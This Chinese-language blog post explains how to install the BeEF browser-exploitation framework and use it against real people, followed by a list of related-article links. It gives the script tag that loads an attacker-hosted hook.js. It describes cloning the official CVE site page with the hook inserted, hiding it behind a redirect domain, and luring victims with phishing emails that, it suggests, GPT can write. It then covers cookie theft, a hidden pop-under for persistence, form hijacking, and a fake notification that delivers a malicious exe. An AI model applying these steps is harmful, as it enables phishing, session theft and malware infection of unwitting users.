首页 > 其他分享 >beef-xss 安装使用

beef-xss 安装使用

时间:2024-09-26 15:03:30浏览次数:8  
标签:xss beef 代码 js html 安装 页面

beef-xss

安装

参考:https://cloud.tencent.com/developer/article/2196746

apt-get install beef-xss

启动 beef-xss

beef-xss

关闭 beef-xss

beef-xss-stop

钓鱼

精华就在于把下面这句 js 代码插入前端文件中(要在实战环境中利用需要端口转发)

<script src="http://ip:3000/hook.js"></script>

可以让 gpt 写一个静态的 html 页面,简单伪造一下,然后把这段 js 代码插入其中

部署 html 文件到公网服务器上,点击链接浏览器便会被挂上钩子。

也可以直接下载网页的 html 文件,然后在其中插入 js 代码后,同样上传到公网服务器。还可以注册个看起来比较官方的域名或者用在线的域名进行 302 重定向,然后发送钓鱼邮件诱导他人点击链接即可。

例如这里直接下载 cve 官方平台的 html,在其中插入 js 代码,由于我没有绑定域名,随便用个在线域名进行重定向到部署了该 html 的服务器,钓鱼邮件就随便写,也可以让 gpt 写个钓鱼邮件

点击该链接就会到我们部署的页面

至此钩子已经挂上了。当然钓鱼方法多种多样,远不止此。

使用

xss弹窗

模块见下图

执行后对方的浏览器网页就会弹出该命令

其实这个模块更像是执行 js 代码,可以执行其他代码,还有

效果:

这个 cookie 窃取就不用多说了,

也可以使用模块功能进行获取,

重定向

直接重定向到其他页面

浏览器截图

前提是谷歌浏览器

权限维持

弹出一个在角落的不起眼的小页面,这个页面里包含了我们的恶意JS代码,这个也是用于权限维持的,因为目标关闭当前页面就会导致BeEF的会话掉线,但如果目标没有关掉小窗口,那么会话就还是会一直在线

劫持输入表单

可以通过构造个全是表格的前端信息,诱导他人进行填写然后利用该模块获取他人信息。

虚假通知栏

这个可以把插件换为恶意的 exe 文件,然后下载运行后进行上线。比如可以伪造一个游戏下载的网页......

标签:xss,beef,代码,js,html,安装,页面
From: https://www.cnblogs.com/gaorenyusi/p/18433465

相关文章

  • (Centos7/麒麟V10)服务器 Redis安装指南
    1.下载或上传安装包安装包官方下载地址:https://download.redis.io/releases/2.准备GCC编译环境查看gcc编译器版本:gcc-v若不存在则执行:yuminstall-ygcc或参考服务器gcc离线安装指南3.解压安装包并移至目标目录本文以redis-7.0.8.tar.gz安装包,部署路径/home/redis为......
  • Linux系统之温度监控工具——lm_sensors的安装和基本使用
    Linux系统之温度监控工具——lm_sensors的安装和基本使用一、lm_sensors介绍lm_sensors,是一款基于linux系统的硬件监控的软件。可以监控主板,CPU的工作电压,温度等数据。rpm包下载地址获取码2344:lm_sensors-3.4.0-6.20160601gitf9185e5.el7.x86_64.rpm二、检测安装环境1.检查......
  • Flink(二)集群安装
    集群安装Standalone模式安装解压缩[user@hadoop102software]$tar-zxvfflink-1.10.1-bin-scala_2.12.tgz-C/opt/module/修改flink/conf/flink-conf.yaml文件jobmanager.rpc.address:hadoop102修改/conf/slaves文件hadoop103hadoop104分发给其他两台虚拟......
  • centos7编译安装Hadoop3
    一、安装编译相关依赖此篇文档及Hadoop相关文档相关软件包统一在此百度网盘:链接:https://pan.baidu.com/s/11F4THdIfgrULMn2gNcObRA?pwd=cjllyuminstallsnappysnappy-develbzip2bzip2-devellzolzo-devellzoplibXtstlzo-develzlib-developensslopenssl-develncurse......
  • centos7二进制安装Hadoop3
    一、Hadoop简介1.1Hadoop3核心组件HDFS:分布式文件系统:解决海量数据存储YARN:集群资源管理和任务调度框架:解决资源任务调度MapReduce:分布式计算框架:解决海量数据计算1.2Hadoop集群简介Hadoop集群包括两个集群:HDFSYARN两个集群逻辑上分离(互不影响、互不依赖)物理上一......
  • Linux服务器运维管理面板1Panel快速安装及安全配置
    1Panel是一个现代化、开源的Linux服务器运维管理面板,旨在帮助运维人员简化服务器管理任务。它提供了直观的界面和强大的功能,使用户可以通过图形化操作界面对服务器进行管理,减少了对命令行的依赖。1Panel支持多种操作系统,适用于Linux服务器,提供了如网站管理、数据库管......
  • CentOS7.4安装部署openstack [Liberty版] (一)
    一、OpenStack简介OpenStack是一个由NASA(美国国家航空航天局)和Rackspace合作研发并发起的,以Apache许可证授权的自由软件和开放源代码项目。OpenStack是一个开源的云计算管理平台项目,由几个主要的组件组合起来完成具体工作。OpenStack支持几乎所有类型的云环境,项目目标是提供实施简......
  • CentOS7.4安装部署openstack [Liberty版] (二)
    继上一篇博客CentOS7.4安装部署openstack[Liberty版](一),本篇继续讲述后续部分的内容一、添加块设备存储服务1.服务简述:OpenStack块存储服务为实例提供块存储。存储的分配和消耗是由块存储驱动器,或者多后端配置的驱动器决定的。还有很多驱动程序可用:NAS/SAN,NFS,ISCSI,Ceph等等。块存......
  • Charles安装及简单使用
    一、安装1.下载软件并安装下载地址:https://www.charlesproxy.com/download/,根据自己电脑操作系统类型自行下载安装2.安装JDK并配置环境变量1)安装JDK(略)2)配置JDK环境变量设置JAVA_HOME(实际路径为JDK安装目录) 设置JDKpath环境变量(jre必须同样要配置)  命令行验证 二、配置HTTP......
  • Centos安装前端开发常用软件
    1.下载指定的版本(根据程序要求下载对应的版本)wget--no-check-certificatehttps://npm.taobao.org/mirrors/node/v10.16.3/node-v10.16.3-linux-x64.tar.gz2.解压并创建系统链接tarxfnode-v10.16.3-linux-x64.tar.gz-C/usr/local/#解压到指定目录cd/usr/local/node-v10.......